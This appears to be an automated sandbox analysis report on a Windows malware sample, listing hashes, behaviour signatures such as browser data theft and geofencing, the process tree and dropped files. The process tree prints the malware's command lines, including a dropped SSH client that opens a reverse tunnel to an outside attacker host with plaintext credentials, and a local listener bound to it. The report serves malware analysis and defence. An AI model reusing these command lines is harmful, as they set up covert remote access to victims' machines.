Analysis
-
max time kernel
136s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
-
submitted
23/11/2022, 20:12
General
-
Target
8f7267942b615aff2cda7c73c1bee9985675c7851a1fdbe51b4af10d3bc09907.exe
-
Size
620KB
-
MD5
4956b7219e873980802e0ba17ab4eb74
-
SHA1
99c2eede878353aa3aa1226baeca6acf29712e3f
-
SHA256
8f7267942b615aff2cda7c73c1bee9985675c7851a1fdbe51b4af10d3bc09907
-
SHA512
3ddc959d5f6870d56298902a7e9cfe1d1e27a964ae28b0b3272df93dc045efd17d5db1fa8c472b68f36a74c68804222d8316065daa66d4025a2264dab286160d
-
SSDEEP
12288:A036q0TmZZfDzS7vJvb+1WA9T2MenWBgMw3V:A036q0CHfyvJToWO2vnWBM
Malware Config
Signatures
-
ACProtect 1.3x - 1.4x DLL software 1 IoCs
Detects file using ACProtect software.
-
Executes dropped EXE 3 IoCs
-
UPX packed file 1 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
-
Loads dropped DLL 1 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Modifies Internet Explorer settings 1 TTPs 35 IoCs
-
Modifies registry class 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 10 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
-
Suspicious use of FindShellTrayWindow 4 IoCs
-
Suspicious use of SetWindowsHookEx 7 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\8f7267942b615aff2cda7c73c1bee9985675c7851a1fdbe51b4af10d3bc09907.exe"C:\Users\Admin\AppData\Local\Temp\8f7267942b615aff2cda7c73c1bee9985675c7851a1fdbe51b4af10d3bc09907.exe"1⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\forbind.exe"C:\Users\Admin\AppData\Local\Temp\forbind.exe" 02⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Win.Msi\alg.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Win.Msi\cssrs.exe"C:\Win.Msi\cssrs.exe" -d -t -l -e0.0.0.0 -i127.0.0.1 -p2103 -a4⤵
- Executes dropped EXE
-
-
C:\Win.Msi\System.exe"C:\Win.Msi\System.exe" -ssh -R 45954:127.0.0.1:2103 homme33vc.zapto.org -l homme33vc -pw 2n30554⤵
- Executes dropped EXE
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://img84.imageshack.us/slideshow/webplayer.php?id=15237971.jpg3⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffcac1746f8,0x7ffcac174708,0x7ffcac1747184⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,10872909756575598793,7768687669625808701,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2176 /prefetch:24⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2164,10872909756575598793,7768687669625808701,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2280 /prefetch:34⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2164,10872909756575598793,7768687669625808701,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2772 /prefetch:84⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,10872909756575598793,7768687669625808701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,10872909756575598793,7768687669625808701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3396 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2164,10872909756575598793,7768687669625808701,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4764 /prefetch:84⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,10872909756575598793,7768687669625808701,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5588 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,10872909756575598793,7768687669625808701,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3740 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,10872909756575598793,7768687669625808701,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5216 /prefetch:24⤵
- Suspicious behavior: EnumeratesProcesses
-
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe/scomma "C:\Users\Admin\AppData\Local\Temp\tmp.ini"2⤵
- Modifies Internet Explorer settings
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:452 CREDAT:17410 /prefetch:23⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
471B
MD5e32d02ce684c01ef3af05fae9066160e
SHA129c7a6e8ed553ac2765634265d1db041d6d422ec
SHA256b00322d178a6cfc206458c26b26d6c80596073bb3283dcc3fc4e33a4b5f29d71
SHA512e4e3175fb131095e4681ecb76d14dc74d059c0beafb6340965516c6d3d0538deb314b36a3f09df03b491edac84d5c0580e764fed1d8bca9abd4e65cb56167148
-
Filesize
434B
MD52fbef02f103e0503a729b4be8baf877a
SHA10dd5e2bcc2f9a368766f9e8bbcab77ed33821c00
SHA2562e79f2df2869d173b8b7ef5ac4e90dd9478765890314defa2f8f43cc75b6662c
SHA512ba27ac9550a6f67cb41ed3924c1a8f8d84bc4705d210761028184c8c3317697d0200df4fa88d40158e17a69b2e58c34442e4ffa1ea7f51e9e8538f6053b4aa9b
-
Filesize
269KB
MD5ce3a92a2eebd9dda206d2ffca2be0981
SHA1f4624de0edd1c14ec2d0810377e52273f595a4ad
SHA256f1844efba38409811b5c02285513b86a0a3cead59b6427882b530a60c23d52ea
SHA51231d84bf1bc0cbce9aa1ccc82eca040424fc8b8f0d012ef6578518480b02781be393c84d3e8878f6f4014e39036ff406cbfae6c7b1578bbef4e10ba1a550374ad
-
Filesize
269KB
MD5ce3a92a2eebd9dda206d2ffca2be0981
SHA1f4624de0edd1c14ec2d0810377e52273f595a4ad
SHA256f1844efba38409811b5c02285513b86a0a3cead59b6427882b530a60c23d52ea
SHA51231d84bf1bc0cbce9aa1ccc82eca040424fc8b8f0d012ef6578518480b02781be393c84d3e8878f6f4014e39036ff406cbfae6c7b1578bbef4e10ba1a550374ad
-
Filesize
171KB
MD5744dcc4cbbfbb18fe3878c4e769ec48f
SHA1c1f2c56ee2d91203a01d3465f185295477a1217d
SHA25633eb31a2a576e663474a895ff0190316c64a93d9ce05a55df0d53f9beeb61163
SHA512706630be2ca09e574a7794e32e515a0a3f993643d034647b8cb976c1e7045e87e30362757cc65fcdb95f4a4327f0dcda3edc82ba84e5ed9115870a037e13af21
-
Filesize
538B
MD5ed3470ec82535b6b52f9fcc0f5ebd9b1
SHA1d416033cdc7819aaf98df15ab8c49d117331ac29
SHA2561ea8146b91c3d1e5ddbf70f2a3d739a3499d7298135b65a00011c581dc898494
SHA512eed06113b4686d18a84b298cf34ca64ca4d69e163969f61bec7b323e709e7b895250aa9915381842ac7e510899d6c45e70bf5b35883a0d51be068ab607146a7d
-
Filesize
323KB
MD5f4bf5c28bed38e31c143abfb9bebb6d5
SHA1015f3e7ce4ff406f712b4ee1c893edfaa9276259
SHA256d79ffe88f41e98fdf29b6ee747519bb4bd546a572235dfdbd6962311455c6971
SHA51272e6ed78e42d357447ada178956b9960784fd3cfc0268ede7d4a602e1f789585d90e5ef006070034a7a9b0f35afd39000eb7fa9f6c2d06f4bddce766b85bc935
-
Filesize
323KB
MD5f4bf5c28bed38e31c143abfb9bebb6d5
SHA1015f3e7ce4ff406f712b4ee1c893edfaa9276259
SHA256d79ffe88f41e98fdf29b6ee747519bb4bd546a572235dfdbd6962311455c6971
SHA51272e6ed78e42d357447ada178956b9960784fd3cfc0268ede7d4a602e1f789585d90e5ef006070034a7a9b0f35afd39000eb7fa9f6c2d06f4bddce766b85bc935
-
Filesize
1KB
MD5057150f4719cb0919d9d717e37e5e6c6
SHA1e69d242f8074528bc6899ef95f145e52c8ac7684
SHA25629b6f773d3526ec2838b1ec317d937cd3035f3ef79d5752c1b57803d50bdbf63
SHA51251d382c12c4949d5ecaf78220e9c106c13268c9704c89ededacba3fefd6d33f26a947425671897194f545dd3990f5c7dba8c9fda1afdbf4abe1dcf9e72d76595
-
Filesize
45KB
MD5199a984c4027236c6650952650b8b917
SHA124a279ea7aacdf2fdfb6a419ae87e2ad59e416fe
SHA256c13de5ba03c02ea1a44aa7fd7af2989b94669c9715ce0e1447a271417a58cfed
SHA512112893ea8475d2eddc42f8375ba295bbe161a7050b2b1879ca89c17fe62bf1da6dd4603aad1067766ebd8fcd7b133dc1ae10a095aa63039716b953722a71258a
-
Filesize
45KB
MD5199a984c4027236c6650952650b8b917
SHA124a279ea7aacdf2fdfb6a419ae87e2ad59e416fe
SHA256c13de5ba03c02ea1a44aa7fd7af2989b94669c9715ce0e1447a271417a58cfed
SHA512112893ea8475d2eddc42f8375ba295bbe161a7050b2b1879ca89c17fe62bf1da6dd4603aad1067766ebd8fcd7b133dc1ae10a095aa63039716b953722a71258a
-
Filesize
360KB